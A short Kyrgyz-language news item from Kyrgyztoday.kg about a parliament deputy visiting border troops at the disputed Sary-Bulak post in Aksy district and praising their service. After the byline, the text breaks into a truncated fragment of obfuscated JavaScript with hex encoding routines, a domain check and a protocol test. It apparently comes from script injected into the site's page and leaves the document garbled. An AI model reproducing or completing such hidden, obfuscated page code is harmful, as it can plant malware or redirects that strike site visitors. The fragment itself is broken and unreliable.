Жогорку Кеӊештин депутаты, “Эл аралык иштер, коргоо жана коопсуздук боюнча комитеттин” мүчөсү Үмбеталы Кыдыралиев Аксы районунун Кашка-Суу айыл өкмөтүндөгү, Өзбекстан менен талашка түшкөн, Сары-Булак участкасында КПП да турган, чек арачы жоокерлер жана Ички иштер министрлигинин атайын даярдыктагы (спецназ) жоокерлеринин абалы менен таанышып чыгып, моралдык жана материалдык колдоо көрсөттү. Бул тууралуу бүгүн, 24-мартта Кyrgyztoday.kg маалымат агенттигине Аксы тургуну Шекербек Камчыбек уулу билдирди.
Жогорку Кеӊештин депутаты өз сөзүндө: “Мекенди коргоо ар бир Кыргыз жаранынын милдети ошондуктан сиздерге бекем ден соолук каалаймын! Азыркы өзгөчө кырдаалда Аксы аймагында сиздер мекен чегинде турганда, эл ичинде тынчтык жана бейкуттук өкүм сүрөт! Мен дагы “Эл аралык иштер, коргоо жана коопсуздук боюнча комитеттин” мүчөсү катары Жогорку Кеӊеште бул маселенин тезирээк жана дипломатиялык жол менен чечилүүсүнө аракет кыламын. Сиздерге рахмат! “Благодарю за службы”, – деди эл өкүлү.
Гүлжан Шерипбаева, Кyrgyztoday.kg
// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[Ss]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "kyrgyztoday.kg"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

КОММЕНТАРИЙ КАЛТЫРУУ